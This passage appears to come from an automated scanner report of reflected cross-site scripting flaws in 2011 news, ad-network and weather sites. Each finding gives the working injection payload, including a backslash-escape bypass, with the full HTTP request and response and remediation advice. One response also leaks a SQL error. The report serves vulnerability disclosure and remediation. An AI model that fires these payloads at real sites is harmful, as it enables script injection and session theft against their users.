<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<form name="online-poll-form" method="post" action="/poll/poll.php/6941f"style="x:expression(alert(1))"5dc6096cd9d?">
...[SNIP]...

2.59. http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-ticker.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f7e9\'%3beb302189a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f7e9\\';eb302189a6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-/8f7e9\'%3beb302189a6enews HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:22 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:24 GMT
Age: 0
Content-Length: 1137
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-/8f7e9\\';eb302189a6enews.php"><span class="time">12:01 am</span>Lighter winds help Texas
...[SNIP]...

2.60. http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-ticker.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3eb9a\'%3balert(1)//bc3ffbac64e was submitted in the rss_name parameter. This input was echoed as 3eb9a\\';alert(1)//bc3ffbac64e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-ticker.php?category_id=1&range=0to6&rss_name=-breaking-news3eb9a\'%3balert(1)//bc3ffbac64e HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:02 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n41), ms lax-agg-n41 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:03 GMT
Age: 0
Content-Length: 1191
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<ul id="TickerVertical"><li><a href="http://tools.themercury.com.au/stories/48249541-breaking-news3eb9a\\';alert(1)//bc3ffbac64e.php"><span class="time">12:01 am</span>Lighter winds he
...[SNIP]...

2.61. http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /feeds/feed-with-lead.php

Issue detail

The value of the rss_name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d0c1\'%3balert(1)//461c9fa19a4 was submitted in the rss_name parameter. This input was echoed as 4d0c1\\';alert(1)//461c9fa19a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /feeds/feed-with-lead.php?category_id=3&range=0to6&rss_name=-world-news4d0c1\'%3balert(1)//461c9fa19a4&1801 HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:03 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n47), ms lax-agg-n47 ( origin)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:23:04 GMT
Age: 0
Content-Length: 1692
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div class="article-extracts-box"><div class="me2-extract-box"><div class="ark-img-class"><a href="http://tools.themercury.com.au/stories/48248721-world-news4d0c1\\';alert(1)//461c9fa19a4.php" >
...[SNIP]...

2.62. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.themercury.com.au
Path:   /yoursay/yoursay-single-extract.php

Issue detail

The value of the range request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6edf0'%3balert(1)//32abf63a0ea was submitted in the range parameter. This input was echoed as 6edf0';alert(1)//32abf63a0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yoursay/yoursay-single-extract.php?range=0to16edf0'%3balert(1)//32abf63a0ea HTTP/1.1
Host: tools.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:51 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n26), ms lax-agg-n26 ( origin>CONN)
Cache-Control: max-age=301
Expires: Wed, 07 Sep 2011 14:22:53 GMT
Age: 0
Content-Length: 195
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

get_Comment_Summary:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '16edf0';alert(1)//32abf63a0ea' at line 3

2.63. http://tps30.doubleverify.com/visit.js [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps30.doubleverify.com
Path:   /visit.js

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10382'%3balert(1)//53fe50912c2 was submitted in the plc parameter. This input was echoed as 10382';alert(1)//53fe50912c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=6973337710382'%3balert(1)//53fe50912c2&advid=2977403&sid=1089807&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 586

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '6973337710382';alert(1)//53fe50912c2', "sid": '1089807' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkNa
...[SNIP]...

2.64. http://tps30.doubleverify.com/visit.js [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps30.doubleverify.com
Path:   /visit.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f581'%3balert(1)//47784fca2f9 was submitted in the sid parameter. This input was echoed as 2f581';alert(1)//47784fca2f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1074175&cmp=5795406&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=69733377&advid=2977403&sid=10898072f581'%3balert(1)//47784fca2f9&adid=&btreg=245334907&btsvrreg=doubleclick&&num=395&srcurl=http%3A%2F%2Fwww.watoday.com.au%2F&curl=&qpgid=&referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN6560.159469.AOD-INVITE%2FB5795406.3%3Bsz%3D300x250%3Bclick%3Dhttp%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpTZqQ8JsCZUJsTIi_406.k2y_JELrFM4m80TCEC.V1WAFQk1bNw1Oed8i1SM8ee.RmPfWfTvNitOYjvKinJdh4yeQiqxZHFiB93NdQAMWVNW.H_rWG4A-%26redirectURL%3D%3Bord%3Da5ae6592-0cb9-4d98-8ee9-22cae8bf6618%3F HTTP/1.1
Host: tps30.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Expires: 9/6/2011 2:14:25 PM
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:24 GMT
Content-Length: 652

function obaCallback() { new OBACan({ "agncid": '1074175', "cmpid": '5795406', "plcid": '69733377', "sid": '10898072f581';alert(1)//47784fca2f9' }, { "advName": 'Yahoo', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://info.yahoo.com/privacy/us/yahoo/details.html', "advLogoURL": '', "networkName": 'AOD - Invite
...[SNIP]...

2.65. http://web.adblade.com/imps.php [description_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the description_color request parameter is copied into the HTML document as plain text between tags. The payload b77c7<script>alert(1)</script>c31484a0f21 was submitted in the description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066ccb77c7<script>alert(1)</script>c31484a0f21&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404872.307975972358; expires=Thu, 08-Sep-2011 14:14:32 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: lighttpd/1.4.21
Content-Length: 9519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
font-family:Arial,Helvetica,sans-serif; }
.adDescription1_83, .adDescription1_83:link, .adDescription1_83:visited, .adDescription1_83:hover {
color:#0066ccb77c7<script>alert(1)</script>c31484a0f21; font-family:Arial,Helvetica,sans-serif; }
.adImage1_83 {
}
</style>
...[SNIP]...

2.66. http://web.adblade.com/imps.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8499"><script>alert(1)</script>d5e2cbfbbc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com&d8499"><script>alert(1)</script>d5e2cbfbbc8=1 HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404886.755567528598; expires=Thu, 08-Sep-2011 14:14:46 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:46 GMT
Server: lighttpd/1.4.18
Content-Length: 9843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
tp://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com&d8499"><script>alert(1)</script>d5e2cbfbbc8=1http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
...[SNIP]...

2.67. http://web.adblade.com/imps.php [title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the title_color request parameter is copied into the HTML document as plain text between tags. The payload e21e9<script>alert(1)</script>71985f1b570 was submitted in the title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000e21e9<script>alert(1)</script>71985f1b570&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404871.460171727576; expires=Thu, 08-Sep-2011 14:14:31 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: lighttpd/1.4.26
Content-Length: 9522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
_83:link, .adTitle1_83:visited, .adTitle1_83:hover,
.adLearnMoreLink1_83, .adLearnMoreLink1_83:link, .adLearnMoreLink1_83:visited, .adLearnMoreLink1_83:hover {
color:#000000e21e9<script>alert(1)</script>71985f1b570; font-family:Arial,Helvetica,sans-serif; }
.adDescription1_83, .adDescription1_83:link, .adDescription1_83:visited, .adDescription1_83:hover {
col
...[SNIP]...

2.68. http://web.adblade.com/imps.php [tpUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the tpUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90d3e"><script>alert(1)</script>1b4d7655608 was submitted in the tpUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com90d3e"><script>alert(1)</script>1b4d7655608 HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315404878.796731717138; expires=Thu, 08-Sep-2011 14:14:38 GMT; path=/
Content-type: text/html
Date: Wed, 07 Sep 2011 14:14:38 GMT
Server: lighttpd/1.4.21
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
ttp://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com90d3e"><script>alert(1)</script>1b4d7655608http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=27698&fc_app_id=3695" target="_blank">
...[SNIP]...

2.69. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://webservice.theweather.com.au
Path:   /ws1/wx.php

Issue detail

The value of the fc request parameter is copied into the HTML document as plain text between tags. The payload e045d<a>fe882287f62 was submitted in the fc parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ws1/wx.php?lt=twcid&lc=9528&obs=1&fc=1e045d<a>fe882287f62&days=5&rollover=24&u=10491-perthnow&k=5fb8723d47d60afa6ddf07191acaf3b0 HTTP/1.1
Host: webservice.theweather.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/multimedia/weatherWidget/5dayForecast/nopromo/WeatherWidget_11.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Content-Length: 1659
Content-Type: text/xml
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:20:15 GMT
Date: Wed, 07 Sep 2011 14:15:15 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1" ?>
<data>
<metadata>
<sector>weather</sector>
<title>Weatherzone</title>
<provider>Weatherzone</provider>
<provider_url>http://www.wea
...[SNIP]...
<forecasts type="1E045D<A>FE882287F62">
...[SNIP]...

2.70. http://www.7perth.com.au/javascript.js [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.7perth.com.au
Path:   /javascript.js

Issue detail

The value of the a request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0dfc%3balert(1)//7471910ea1e was submitted in the a parameter. This input was echoed as f0dfc;alert(1)//7471910ea1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /javascript.js?file=crossfade&a=cf1f0dfc%3balert(1)//7471910ea1e&b=crossfader&c=aW50ZXJ2YWw6MTYuMCxkdXJhdGlvbjoyLGF1dG9TdGFydDp0cnVlLHNldFNpemU6dHJ1ZQ== HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2

Response

HTTP/1.1 200 OK
Cache-Control: public, maxage=31536000
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:03 GMT
Expires: Thu, 06 Sep 2012 14:15:03 GMT
Pragma: public
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 123
Connection: keep-alive

var cf1f0dfc;alert(1)//7471910ea1e = new Crossfade('crossfader', { interval:16.0,duration:2,autoStart:true,setSize:true });

2.71. http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.7perth.com.au
Path:   /view/2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4033<a>d6e90fbbbbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

